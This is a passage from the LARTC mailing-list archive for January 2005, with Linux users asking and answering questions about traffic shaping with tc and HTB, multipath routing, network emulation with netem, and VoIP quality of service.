<1106154574.41ee944e8a6db@imp4-q.free.fr> Hello, if I use : # ip rule add tos reliability iif lo lookup table_1 # ip route add default via <@IP> table table_1 It seems that the response packets for the ones send with a TOS of "reliability" need to have the same TOS or they are drop by the kernel (2.4.25). Why ? Francois-Xavier From vincent-perrier@club-internet.fr Wed Jan 19 21:42:19 2005 From: vincent-perrier@club-internet.fr (vincent perrier) Date: Wed, 19 Jan 2005 22:42:19 +0100 Subject: [LARTC] tail and head drop qdiscs Message-ID: <1106170939.10019.23.camel@localhost.localdomain> I think that there are no qdiscs that permit to drop the oldest frame of a queue when this queue is full, but I would like to be wrong: bfifo drops arriving frames when the max queue length is reached. red also drops arriving frames in a more elaborate fashion, with a drop probability that increases above a limit and becomes a drop certitude when the max queue length is reached. sfq drops "fairly", it piles frames with same (ip source, ip dest, port source and port dest) and drops a frame from the biggest pile to favour the smaller flows. But I cannot find the qdisc that reacts like a bfifo or red qdisc but drops the oldest message of the queue when a drop is needed. Even better: a qdisc with an autodestruct algorithm for each frame in the queue that would garantee the "freshness" of each frame coming out. If you know of such qdiscs, please share. From mail2spj@yahoo.com Thu Jan 20 02:09:57 2005 From: mail2spj@yahoo.com (SPJ) Date: Wed, 19 Jan 2005 18:09:57 -0800 (PST) Subject: [LARTC] Interface not marked down when links are down Message-ID: <20050120020957.43586.qmail@web50108.mail.yahoo.com> Hi, I am not sure if this problem has already being posted, but I haven't found any solution. Excuse me if it's a repost but would appreciate any pointers. I have newly configured Multipath default route. I have 1 local connection and 4 internet connections. I am using kernel 2.6.7 and have applied Julian's relevent patches. When the next hop is down, julian's patch takes care of the links changing the route to only the links which it finds are up and forwarding traffic to those links. But if the problem is anywhere in between, beyond the next hop, the links are not marked identified as down (I down see the change in multipath default route) and requests still go via them and hence no connectivity, even if some other links are up. Does Julian's patch takes care of route only if next hop is down. Any solution to this problem? Thanks, SPJ __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com From gypsy@iswest.com Thu Jan 20 06:51:57 2005 From: gypsy@iswest.com (gypsy) Date: Wed, 19 Jan 2005 22:51:57 -0800 Subject: [LARTC] tc limit References: <41EE78F8.4826B6C8@iswest.com> Message-ID: <41EF550D.BF502865@iswest.com> Martin Schiøtz wrote: > > Thanks, with "prio #" on all filters - all rules can be added. > :-) You're welcome. > Just curious - Is there a reason for the ~2K limit on filters with "prio 0"? > > Martin No reason I'm aware of. Probably some OOPS! in the code that creates filters. Since I've never bothered to learn C, I've also never bothered to read the source code. So I'd never spot a programming mistake no matter how obvious, and I suspect that this one is very subtle. The real crime here is that the docs do not tell you that there is this trap that "everyone" with a lot of users falls into. > On Wed, 19 Jan 2005 07:12:56 -0800, gypsy wrote: > > Martin Schiøtz wrote: > > > > > > Hi > > > > Hello. > > > > > I have been playing with tc. I'm using htb and sfq. I tried to setup > > > shaping of every ip address within a /20. > > > I found that there must be an upper limit of about 2096 on the number > > > of rules (classes, qdiscs or filters). I was testing a /20 which gives > > > 4096 classes, qdiscs and filters. I'm using hashkey to optimize > > > processing of frames. > > > > Filters. > > > > > Is there a limit with tc or I'm I doing something wrong ? > > > > Yes, sort of. Yes. > > > > > This is the script: > > > #!/bin/sh > > > > > > > > /sbin/tc filter add dev eth1 parent 1:3 protocol ip u32 > > > > 'prio #' must be included in all 'filter' lines where "#" is not zero > > and is always the same; the "zero prio" has a limit and there is a limit > > on '#' - but no limit on how many times '#' can be (e.g.) 5 > > > > So, e.g.: > > tc filter add dev eth1 parent 1: protocol ip prio 5 \ > > u32 match ip src $IP flowid 1:40 > > > > will run at least 64K times without complaint, but this will fail after > > ~2K: > > tc filter add dev eth1 parent 1: protocol ip prio 0 \ > > u32 match ip src $IP flowid 1:40 > > > > > /sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divisor 256 > > > /sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst > > > 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3: > > > > google LARTC please document > > > > gypsy From lartc@draxinusom.ch Thu Jan 20 07:25:20 2005 From: lartc@draxinusom.ch (Rene Gallati) Date: Thu, 20 Jan 2005 08:25:20 +0100 Subject: [LARTC] Interface not marked down when links are down In-Reply-To: <20050120020957.43586.qmail@web50108.mail.yahoo.com> References: <20050120020957.43586.qmail@web50108.mail.yahoo.com> Message-ID: <41EF5CE0.2040501@draxinusom.ch> SPJ wrote: > I am not sure if this problem has already being > posted, but I haven't found any solution. Excuse me if > it's a repost but would appreciate any pointers.=20 > I have newly configured Multipath default route. I > have 1 local connection and 4 internet connections. I > am using kernel 2.6.7 and have applied Julian's > relevent patches.=20 > When the next hop is down, julian's patch takes care > of the links changing the route to only the links > which it finds are up and forwarding traffic to those > links. But if the problem is anywhere in between, > beyond the next hop, the links are not marked > identified as down (I down see the change in multipath > default route) and requests still go via them and > hence no connectivity, even if some other links are > up. > Does Julian's patch takes care of route only if next > hop is down. Any solution to this problem? You are looking at the wrong layer. If the next hop is unreachable,=20 which is a layer 2 thing, the system notices this and acts accordingly.=20 If however a link further away is down, there is no such mechanism on=20 layer 2 and your system cannot react to it (with standard means). This is quite "psychic" if you want. Why should your system magically=20 know there is a problem 4 hops upstream ? It only sees the links it is=20 directly attached. The packets are accepted on one link and this is=20 where the responsibility of your multihomed system ends. It neither does = nor should track packets over the full path from source to destination. There is a solution however: For that kind of thing you need to look=20 into routing software (BGP, OSPF) which has this capability. If you=20 don't control the upstream machines, you will need to get a bgp-peering=20 with your upstream provider to be able to react to outages. If your=20 mentioned 4 connections are standard home-adsl/cable connections, this=20 might be difficult however. Hope that helps. --=20 C U - -- ---- ----- -----/\/ Ren=E9 Gallati \/\---- ----- --- -- - From DurgaPrasad Adusumalli Thu Jan 20 09:45:41 2005 From: DurgaPrasad Adusumalli (DurgaPrasad Adusumalli) Date: Thu, 20 Jan 2005 15:15:41 +0530 Subject: [LARTC] Bandwidth Management Scripts Message-ID: <75b657f40501200145221ceef9@mail.gmail.com> I am a newbie to bandwidth management and trying to manage bandwidth with classbased queuing using HTB (Hierarchical Token Bucket) as this is simple and more efficient. In this process, I am trying to write a config file that helps in managing queuing rules easy. Can anyone help me wiith this. From igogu@umsoft.ro Thu Jan 20 09:56:25 2005 From: igogu@umsoft.ro (Ionut Gogu) Date: Thu, 20 Jan 2005 11:56:25 +0200 Subject: [LARTC] Bandwidth Management Scripts References: <75b657f40501200145221ceef9@mail.gmail.com> Message-ID: <001c01c4fed6$4ddad520$340aa8c0@unix> Hello You can use a set of tools : htb_tools 0.2.5 for bandwidth management, bandwidth statistics ; Documentation and HowTo you can find at www.arny.ro/htb , a set of configurations file/exemple etc; For more informations please contact me; http://www.arny.ro/htb/htb_tools-0.2.5/docs/HowTo/htb_tools-howto-ro.html ----- Original Message ----- From: "DurgaPrasad Adusumalli" To: Sent: Thursday, January 20, 2005 11:45 AM Subject: [LARTC] Bandwidth Management Scripts >I am a newbie to bandwidth management and trying to manage bandwidth > with classbased queuing using HTB (Hierarchical Token Bucket) as this > is simple and more efficient. In this process, I am trying to write a > config file that helps in managing queuing rules easy. Can anyone help > me wiith this. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From raptor@tvskat.net Thu Jan 20 11:53:18 2005 From: raptor@tvskat.net (raptor@tvskat.net) Date: Thu, 20 Jan 2005 13:53:18 +0200 Subject: [LARTC] more than one cpu Message-ID: <20050120135318.78990403@bugs> hi, Is there benefit of running 2 cpus box for shaper ? ----- http://linuxtoday.com/news_story.php3?ltsn=2004-12-08-004-32-OS-BZ-DT-0005 snip> MS Office is popular in the same way as heart disease is the most popular way to die. From Adolf Nepolean Raj Thu Jan 20 11:54:15 2005 From: Adolf Nepolean Raj (Adolf Nepolean Raj) Date: Thu, 20 Jan 2005 17:24:15 +0530 Subject: [LARTC] i want to know about tol in tcp/ip Message-ID: hello sir.. I am adolf and i am doing my final year engineering in NIT-Trichy. I am going to do my project in job scheduling. Fot that i want to know that how to extract the tol from the tcp/ip and some more details of that. It will be very helpful for my project. Bye. ADOLF. From ajpearce@ajpearce.co.uk Thu Jan 20 22:07:06 2005 From: ajpearce@ajpearce.co.uk (ajpearce) Date: Thu, 20 Jan 2005 22:07:06 +0000 Subject: [LARTC] Hardware solution? (or v.easy software fix instead) Message-ID: <27251cb80501201407a89427a@mail.gmail.com> I'm moving to a new place and my new flatmate wants a router because he likes the cleaness of it all in a non geeky way which I can understand. This means it's going to be hard for me to pursude him to let me run a computer as a router to act as bandwidth cop. But I don't fancy trying to use ssh, VNC and games while he's using WindowsUpdate or p2p. So I need an answer to avoid arguments. - Is there a plush hardware solution to the problem? As a backup I've been looking into bandwidth scripts for an easy and sure way to do the job. I've tried using htb.init and a smoothwall module to do it but neither seemed to work. Now, I could spend ages trying to get it working and so forth but when it comes to this I'm sharing with someone else so I need something that will work brilliantly and straight off. If I go for the computer option and I'm able to pull it off I might as well make it a fileserver and use it as a single computer to download stuff on (so bittorrent, eDonkey and so we have 1 computer left on and not 3. If so what approach would you take for this? Use my own setup but binary parts to be sure it will work including kernel, iptables and iproute? - or should I take a distro setup for this and add stuff to that instead? I need: - samba - as many p2p programs as possible - maybe other server software - something to download with, say wget What would be your approach to this? I want to find a solution that involves less steps to make mistakes on because I haven't had it working properly yet. Here are some links to scripts and the like I found in order of interest: http://www.smidsrod.no/products/firewall/supershaper/ http://www.metamorpher.de/fairnat/ #complex but hopeful: http://www.digriz.org.uk/jdg-qos-script/#howitworks http://users.skynet.be/cbqinit/ http://www.chronox.de/tc+filter/limit.conn-0.2.bz2 http://www.freenet.org.nz/python/pyshaper/#screenshot #proxy based limiter: http://www.stewart.com.au/ip_relay/ #comphrehensive: http://bwm-tools.pr.linuxrulz.org/ From jasonb@edseek.com Thu Jan 20 22:21:00 2005 From: jasonb@edseek.com (Jason Boxman) Date: Thu, 20 Jan 2005 17:21:00 -0500 Subject: [LARTC] Hardware solution? (or v.easy software fix instead) In-Reply-To: <27251cb80501201407a89427a@mail.gmail.com> References: <27251cb80501201407a89427a@mail.gmail.com> Message-ID: <200501201721.00234.jasonb@edseek.com> On Thursday 20 January 2005 17:07, ajpearce wrote: > So I need an answer to avoid arguments. > > - Is there a plush hardware solution to the problem? You could always get one of those Linksys routers that runs Linux and configure Linux traffic control on it. > If I go for the computer option and I'm able to pull it off I might as > well make it a fileserver and use it as a single computer to download > stuff on (so bittorrent, eDonkey and so we have 1 computer left on and > not 3. If so what approach would you take for this? Use my own setup > but binary parts to be sure it will work including kernel, iptables > and iproute? - or should I take a distro setup for this and add stuff > to that instead? I need: L7-Filter hasn't been picking up Kademilia so filtering eDonkey tends to be difficult. ipp2p might be better about this, but I haven't tried it. I just filter based on IP for p2p since I only have a single box that does any p2p. > http://www.metamorpher.de/fairnat/ fairnat ought to let you share bandwidth out between groups of machines, so you and your roommate ought to be able to split up the bandwidth. From ajpearce@ajpearce.co.uk Thu Jan 20 23:17:38 2005 From: ajpearce@ajpearce.co.uk (ajpearce) Date: Thu, 20 Jan 2005 23:17:38 +0000 Subject: [LARTC] Hardware solution? (or v.easy software fix instead) In-Reply-To: <200501201721.00234.jasonb@edseek.com> References: <27251cb80501201407a89427a@mail.gmail.com> <200501201721.00234.jasonb@edseek.com> Message-ID: <27251cb805012015176990075b@mail.gmail.com> The linksys linux router sounds ideal. Has anyone setup bandwidth management on it before though? Sounds like a tall order? On Thu, 20 Jan 2005 17:21:00 -0500, Jason Boxman wrote: > On Thursday 20 January 2005 17:07, ajpearce wrote: > > > So I need an answer to avoid arguments. > > > > - Is there a plush hardware solution to the problem? > > You could always get one of those Linksys routers that runs Linux and > configure Linux traffic control on it. > > > > If I go for the computer option and I'm able to pull it off I might as > > well make it a fileserver and use it as a single computer to download > > stuff on (so bittorrent, eDonkey and so we have 1 computer left on and > > not 3. If so what approach would you take for this? Use my own setup > > but binary parts to be sure it will work including kernel, iptables > > and iproute? - or should I take a distro setup for this and add stuff > > to that instead? I need: > > L7-Filter hasn't been picking up Kademilia so filtering eDonkey tends to be > difficult. ipp2p might be better about this, but I haven't tried it. I just > filter based on IP for p2p since I only have a single box that does any p2p. > > > > http://www.metamorpher.de/fairnat/ > > fairnat ought to let you share bandwidth out between groups of machines, so > you and your roommate ought to be able to split up the bandwidth. > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From Robert Kurjata Fri Jan 21 09:02:21 2005 From: Robert Kurjata (Robert Kurjata) Date: Fri, 21 Jan 2005 10:02:21 +0100 Subject: Re[2]: [LARTC] Hardware solution? (or v.easy software fix instead) In-Reply-To: <27251cb805012015176990075b@mail.gmail.com> References: <27251cb80501201407a89427a@mail.gmail.com> <200501201721.00234.jasonb@edseek.com> <27251cb805012015176990075b@mail.gmail.com> Message-ID: <129545270.20050121100221@ire.pw.edu.pl> Witaj ajpearce, W Twoim li=9Ccie datowanym 21 stycznia 2005 (00:17:38) mo=BFna przeczyta=E6: Slightly OT but, For a Linksys wireless router (WRT54G) there are perfect solutions using wondershaper + iproute2 in an alternative firmwares. Also you can build your own firmware cause a build environment just works. Look at http://www.portless.net/menu/ewrt/ as a starting point, links at the end will drive you to the all important places. From=20my experience: kernel 2.4.20 + iproute2 + wonderhaper + ebtables + iptables + vconfig are just ready waiting for use. > The linksys linux router sounds ideal. Has anyone setup bandwidth > management on it before though? Sounds like a tall order? [snip] >> LARTC mailing list / LARTC@mailman.ds9a.nl >> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >> > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ --=20 Pozdrowienia, Robert Kurjata From ajpearce@ajpearce.co.uk Fri Jan 21 19:26:20 2005 From: ajpearce@ajpearce.co.uk (ajpearce) Date: Fri, 21 Jan 2005 19:26:20 +0000 Subject: Re[2]: [LARTC] Hardware solution? (or v.easy software fix instead) In-Reply-To: <129545270.20050121100221@ire.pw.edu.pl> References: <27251cb80501201407a89427a@mail.gmail.com> <200501201721.00234.jasonb@edseek.com> <27251cb805012015176990075b@mail.gmail.com> <129545270.20050121100221@ire.pw.edu.pl> Message-ID: <27251cb805012111263849b8fa@mail.gmail.com> I am considering this. But we will also be using a cable modem. I wondered if I could even get the cable modem to do CBQ as well with something like sigma! Just a thought though. On Fri, 21 Jan 2005 10:02:21 +0100, Robert Kurjata wrote: > Witaj ajpearce, >=20 > W Twoim li=C5=9Bcie datowanym 21 stycznia 2005 (00:17:38) mo=C5=BCna prze= czyta=C4=87: >=20 > Slightly OT but, >=20 > For a Linksys wireless router (WRT54G) there are perfect solutions > using wondershaper + iproute2 in an alternative firmwares. Also you > can build your own firmware cause a build environment just works. >=20 > Look at http://www.portless.net/menu/ewrt/ as a starting point, links > at the end will drive you to the all important places. >=20 > From my experience: kernel 2.4.20 + iproute2 + wonderhaper + ebtables + > iptables + vconfig are just ready waiting for use. >=20 > > The linksys linux router sounds ideal. Has anyone setup bandwidth > > management on it before though? Sounds like a tall order? >=20 >=20 > [snip] >=20 > >> LARTC mailing list / LARTC@mailman.ds9a.nl > >> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > >> > > _______________________________________________ > > LARTC mailing list / LARTC@mailman.ds9a.nl > > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >=20 >=20 > -- > Pozdrowienia, > Robert Kurjata >=20 > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From wwickersham@printinc.com Fri Jan 21 21:49:25 2005 From: wwickersham@printinc.com (Walter Wickersham) Date: Fri, 21 Jan 2005 13:49:25 -0800 Subject: [LARTC] equal cost multipath routing and incoming services... Message-ID: <8A1DA40786CE4741850C0AF80F2D525602F76A0B@idealab.printperpage.com> We're trying to figure out how to have equal cost multipath routing = using OSPF (quagga) and have come up with the following... Has anyone done something similar? -- How do you deal with incoming = services (mail/web/etc) in such a scenario as below - And does anyone = have any suggestions? There's more detail below.... Diagram and overview: Network A connects to Core1 and Core2 via 100mbit ethernet, and uses a virtual default gateway IP address provided by UCARP. Core1 and Core2 are each connected to Border1 and Border2 via 100mbit ethernet links. Border1 is connected to ISP1 via a T1, same thing with Border2 and ISP2. Remote1 is on a T1, Remote2 is on a DSL line. Each remote router connects via IPSec to both Border1 and Border2. We run GRE tunnels over these IPSec connections and route traffic over the GRE tunnels using OSPF with Quagga. This allows us to do failover and load balancing. The core router tier does not exist right now. We want to put it in place so that the OSPF costs will be the same for either path to each remote site. We desire to continue to have incoming services hosted by servers on Network A. While packets will come in from, say, ISP1, be NAT'd by border1, and arrive at the server on Network A without a problem, we need to ensure that core1 and core2 route those return packets to border1 instead of border2. Likewise for the services we want to host using ISP2. [Network A] | | [core1] [core2] | \ / | | \ / | | X | | / \ | | / \ | [border1] [border2] | | ISP1 ISP2 | | \ / ( The Internet ) / \ | | ISP3 ISP4 (Networks D through P | | not shown for clarity) [remote1] [remote2] | | [Network B] [Network C] From pankaj@toughguy.net Sat Jan 22 05:45:27 2005 From: pankaj@toughguy.net (Pankaj Agarwal) Date: Sat, 22 Jan 2005 11:15:27 +0530 Subject: [LARTC] help regarding seeting up multiple gateway on linux Message-ID: <004a01c50045$96df7ee0$8d00150a@dreammac> This is a multi-part message in MIME format. ------=_NextPart_000_0047_01C50073.ACD49860 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi All, I need a little help and guidance from you all. Actually i am facing too = problems. One is whenever I change default gateway by issuing route = coomand ...my system works as the way i want it to...but after restart = it it reads the old gateway IP...where I'm wrong? Other thing is I am = trying to configure my server for multipath routing...but i am unable to = do so... when I issue command as "ip route add dev devname = src ip table tabname" it gives me a rtnetlink error...Kindly share with = me your experinces on setting up multiple gateways... I have used = aliasing eth0:0 style for the dev on which both os the gateways are = configured.. waiting/expecting for a lot of email replies to my query.. Thanks and Regards, Pankaj ------=_NextPart_000_0047_01C50073.ACD49860 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi All,
 
I need a little help and guidance from = you all.=20 Actually i am facing too problems. One is whenever I change default = gateway by=20 issuing route coomand ...my system works as the way i want it to...but = after=20 restart it it reads the old gateway IP...where I'm wrong? Other thing is = I am=20 trying to configure my server for multipath routing...but i am unable to = do=20 so... when I issue command as "ip route add <network/bit> dev = devname src=20 ip table tabname" it gives me a rtnetlink error...Kindly share with me = your=20 experinces on setting up multiple gateways... I have used aliasing = eth0:0 style=20 for the dev on which both os the gateways are configured..
 
waiting/expecting for a lot of email = replies to my=20 query..
 
Thanks and Regards,
 
Pankaj
------=_NextPart_000_0047_01C50073.ACD49860-- From vinaymathew80@yahoo.com Sat Jan 22 13:46:19 2005 From: vinaymathew80@yahoo.com (vinay mathew) Date: Sat, 22 Jan 2005 05:46:19 -0800 (PST) Subject: [LARTC] network emulation Message-ID: <20050122134619.18266.qmail@web50407.mail.yahoo.com> --0-2085322301-1106401579=:16427 Content-Type: text/plain; charset=us-ascii hi, I am really a newbie in linux traffic control.But i have task to implement a tool similar to the nistnet tool used for netwok emulation tests but which emulates a wireless environment. I was exploring the use of the traffic control subsystem for this task.In this regard i have a few questions i need to post in order to clarify my thoughts on how to do this.I am using tcng to classify traffic and generate the commands necessary to set up the traffic control structures. 1. A simple task to add say a delay of 10ms to packets goin to a particular destination.I tried this using a simple fifo queue and a tbf queue but was not able to obtain the required results.The queue parameters dont have an explicit delay/latency parameter so basically i want to know how to add a delay/latency to packets goin out thro a particular interface. A simple script that i tried dev INTERFACE{ egress{ class(<$latency>) if ip_dst == 10.0.0.14; class(<$other>) if 1; prio{ $latency=class { //how to set these parameters here to achieve the required delay tbf(limit 10kB, rate 20kbps, burst 2 kB, mtu 1500B); } $other=class { fifo(limit 10kB); } } } } 2.The second part is similar to the first but involves dropping a percentage of packets instead of adding a delay to them.Example i need a 10% packet drop for packets coming from source 1 and heading to dest 2. Example i use a simple fifo queue with a limit of 2 kB in order to just test random drop capability.When i use the ping utility with a packet size greater than 2kB i get the message that 0 packets sent and 0 packets received and when the packet sizes are < 2048 bytes then there is no drop or delay at all.Ne ideas on this one. 3.To implement bandwidth sharing among different hosts.Example 4 hosts are communicating to each other and all traffic between them is routed through a router which is like the bottleneck and acts as the wireless network environment with the bottleneck capacity as the known wireless link capacity.I was thinking and am currently trying this using the HTB queuing discipline.I wanted to know if this idea can be effectively implemented using the HTB queuing discipline. Also im having some problems with installation and working of tcng on my Suse 9.2 system which is running with a 2.6.8 kernel version.Ok the simulator could not be compiled. But when i tried using the commands generated by the tcng compiler i get the error that dsmark queuing discipline is not supported.However when i use the root keyword using the tc tool there seems to be no problem.I read that root and dsmark are the same ...or am i wrong about this. Also my kernel has all the parameters enabled for QoS support.I tried compiling iproute2 from source but im not able to since im getting errors while compiling.Can neone throw some light on this.Or is it that there are some compatibility problems with the newer 2.6 kernels. Im sorry for the long content of the mail.But im a newbie and want to get my thoughts rite on this and whether its possible.Thanx a million in advance. regards vinay __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com --0-2085322301-1106401579=:16427 Content-Type: text/html; charset=us-ascii
hi,
I am really a newbie in linux traffic control.But i have task to implement a tool similar to
the nistnet tool used for netwok emulation tests but which emulates a wireless environment.
I was exploring the use of the traffic control subsystem for this task.In this regard i have
a few questions i need to post in order to clarify my thoughts on how to do this.I am using
tcng to classify traffic and generate the commands necessary to set up the traffic control
structures.
 
1. A simple task to add say a delay of 10ms to packets goin to a particular destination.I
tried this using a simple fifo queue and a tbf queue but was not able to obtain the required
results.The queue parameters dont have an explicit delay/latency parameter so basically i
want to know how to add a delay/latency to packets goin out thro a particular interface.
A simple script that i tried
dev INTERFACE{
 egress{
  class(<$latency>) if ip_dst == 10.0.0.14;
  class(<$other>) if 1;
  
  prio{
   $latency=class {
   //how to set these parameters here to achieve the required delay
    tbf(limit 10kB, rate 20kbps, burst 2 kB, mtu 1500B);
   }
   $other=class {
    fifo(limit 10kB);
   }
  }
 }
}
 
2.The second part is similar to the first but involves dropping a percentage of packets
instead of adding a delay to them.Example i need a 10% packet drop for packets coming from
source 1 and heading to dest 2. Example i use a simple fifo queue with a limit of 2 kB in
order to just test random drop capability.When i use the ping utility with a packet size
greater than 2kB i get the message that 0 packets sent and 0 packets received and when the
packet sizes are < 2048 bytes then there is no drop or delay at all.Ne ideas on this one.
 
3.To implement bandwidth sharing among different hosts.Example 4 hosts are communicating to each other and all traffic between them is routed through a router which is like the
bottleneck and acts as the wireless network environment with the bottleneck capacity as the
known wireless link capacity.I was thinking and am currently trying this using the HTB
queuing discipline.I wanted to know if this idea can be effectively implemented using the
HTB queuing discipline.

Also im having some problems with installation and working of tcng on my Suse 9.2 system
which is running with a 2.6.8 kernel version.Ok the simulator could not be compiled. But
when i tried using the commands generated by the tcng compiler i get the error that dsmark
queuing discipline is not supported.However when i use the root keyword using the tc tool there seems to be no problem.I read that root and dsmark are the same ...or am i wrong about this. Also my kernel has all the parameters enabled for QoS support.I tried compiling iproute2 from source but im not able to since im getting errors while compiling.Can neone throw some light on this.Or is it that there are some compatibility problems with the newer 2.6 kernels.
Im sorry for the long content of the mail.But im a newbie and want to get my thoughts rite
on this and whether its possible.Thanx a million in advance.
regards
vinay

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com --0-2085322301-1106401579=:16427-- From david_list@boreham.org Sat Jan 22 17:00:15 2005 From: david_list@boreham.org (David Boreham) Date: Sat, 22 Jan 2005 09:00:15 -0800 Subject: [LARTC] network emulation References: <20050122134619.18266.qmail@web50407.mail.yahoo.com> Message-ID: <078301c500a3$d82af3d0$da529145@mtbrook.bozemanpass.com> This is a multi-part message in MIME format. ------=_NextPart_000_0780_01C50060.C9E18E30 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I am really a newbie in linux traffic control.But i have task to = implement a tool similar to=20 the nistnet tool used for netwok emulation tests but which emulates a = wireless environment.=20 Interesting project. I'd suspect that 90% of the effort will be in = determining models for wireless path characteristics ;) 1. A simple task to add say a delay of 10ms to packets goin to a = particular destination.I=20 http://developer.osdl.org/shemminger/netem/ 2.The second part is similar to the first but involves dropping a = percentage of packets=20 instead of adding a delay to them.Example i need a 10% packet drop for = packets coming from=20 netem will do this too. 3.To implement bandwidth sharing among different hosts.Example 4 hosts = are communicating to each other and all traffic between them is routed = through a router which is like the=20 bottleneck and acts as the wireless network environment with the = bottleneck capacity as the=20 known wireless link capacity.I was thinking and am currently trying = this using the HTB=20 queuing discipline.I wanted to know if this idea can be effectively = implemented using the=20 HTB queuing discipline. Probably. You might try using imq devices with HTB to get the traffic to go through the shaper the way you want. Real wireless networks have quite complex characteristics though, which I suspect will require = custom code. ------=_NextPart_000_0780_01C50060.C9E18E30 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

 
I am really a newbie in linux traffic=20 control.But i have task to implement a tool similar to
the nistnet tool used for netwok emulation tests but which = emulates a=20 wireless environment.
Interesting project. I'd = suspect that 90%=20 of the effort will be in determining
models for wireless path = characteristics=20 ;)
1. A simple task to add say a delay of 10ms to packets goin to a=20 particular destination.I
http://developer.osd= l.org/shemminger/netem/
2.The second part is similar to the first but involves dropping a = percentage of packets
instead of adding a delay to them.Example i need a 10% packet = drop for=20 packets coming from
netem will do this = too.
3.To implement bandwidth sharing among different hosts.Example 4 = hosts=20 are communicating to each other and all traffic between them is routed = through=20 a router which is like the
bottleneck and acts as the wireless network environment with the=20 bottleneck capacity as the
known wireless link capacity.I was thinking and am currently = trying this=20 using the HTB
queuing discipline.I wanted to know if this idea can be = effectively=20 implemented using the
HTB queuing discipline.
Probably. You might try using = imq devices=20 with HTB to get the traffic
to go through the shaper the = way you want.=20 Real wireless networks have
quite complex characteristics = though, which=20 I suspect will require custom code.
 
 
------=_NextPart_000_0780_01C50060.C9E18E30-- From riccardo@e4a.it Sat Jan 22 17:15:17 2005 From: riccardo@e4a.it (Riccardo Losselli) Date: Sat, 22 Jan 2005 18:15:17 +0100 Subject: [LARTC] Info about VoiP Qos Message-ID: <41F28A25.1030108@e4a.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, i've been working on VoIP qos in the few weeks. I shape IAX2 and SIP, and i'm getting some interesting results. Im using HTB, the line is 512Kbps dedicated line, and we have some servers on the same line that generate quite a lot of traffic, frequently saturating the link. I've read through LARTC how to, example, etc, and so far i'm at this point: I can can shape the servers traffic, based on ip and services I can shape the Voip traffic If i reserve some bandwith for VoIP and the rest for server traffic, it all runs smooth This setup works by creating a root disc, then two "source" disc, one rated at 100 Kbps for voip, one rated 300Kbps. The remaining 100Kbps is "wasted" to avoid buffering from the router But i would like to have the possibility to use all the 400Kbps and slow down server traffic only when and if needed. I prioritized VoIP traffic, using the various scripts around, and what i get is that, even if voip quality is definitely much much better than without shaping, there are is still statics and pops, and some interruption of the voice and only if i'm called from POTS I do not get this when completely reserving the bandwith or when the link is not loaded. i would like to ask if this is a normal behaviour before keeping to try to understand if i missed something somewhere.. if it's not normal i would post my script and ask for a suggestion. BTW i get the same results when using wondershaper and so on. Thanks, Ricky -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFB8oolwfVi6Z6cQK8RApbVAKCZEb/pfBRv5qaF5crcVSWCnezUaACdFGFz T/ZcbeymTclRyQXd0Rva0i0= =Ahk1 -----END PGP SIGNATURE----- From jasonb@edseek.com Sat Jan 22 18:11:32 2005 From: jasonb@edseek.com (Jason Boxman) Date: Sat, 22 Jan 2005 13:11:32 -0500 Subject: [LARTC] Info about VoiP Qos In-Reply-To: <41F28A25.1030108@e4a.it> References: <41F28A25.1030108@e4a.it> Message-ID: <200501221311.32569.jasonb@edseek.com> On Saturday 22 January 2005 12:15, Riccardo Losselli wrote: > i would like to ask if this is a normal behaviour before keeping to try > to understand if i missed something somewhere.. > if it's not normal i would post my script and ask for a suggestion. > BTW i get the same results when using wondershaper and so on. What I found most helpful, when things were not working as I thought I had configured them to, was to graph for a duration and compare the incidents with the graph output. If you can pinpoint spikes on the graph or other events with VoIP issues, you might see if your configuration is at fault. ( Shameless plug: http://trekweb.com/~jasonb/articles/traffic_shaping/monitoring.html ) -- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From riccardo@e4a.it Sat Jan 22 20:03:06 2005 From: riccardo@e4a.it (Riccardo Losselli) Date: Sat, 22 Jan 2005 21:03:06 +0100 Subject: [LARTC] Info about VoiP Qos In-Reply-To: <200501221311.32569.jasonb@edseek.com> References: <41F28A25.1030108@e4a.it> <200501221311.32569.jasonb@edseek.com> Message-ID: <41F2B17A.7070203@e4a.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 | What I found most helpful, when things were not working as I thought I had | configured them to, was to graph for a duration and compare the incidents | with the graph output. If you can pinpoint spikes on the graph or other | events with VoIP issues, you might see if your configuration is at fault. | | ( Shameless plug: | http://trekweb.com/~jasonb/articles/traffic_shaping/monitoring.html ) Thanks.. it will be useful! I've just graphed it, and it seems ok.. i can see the root, the four child (three are used to shape each one of the three lines we have, that share the same shaper, one is used to put the traffic going from one of the three local nets to the other, which i do not want to be shaped) and their respective child, and finally the leaf classes (question: 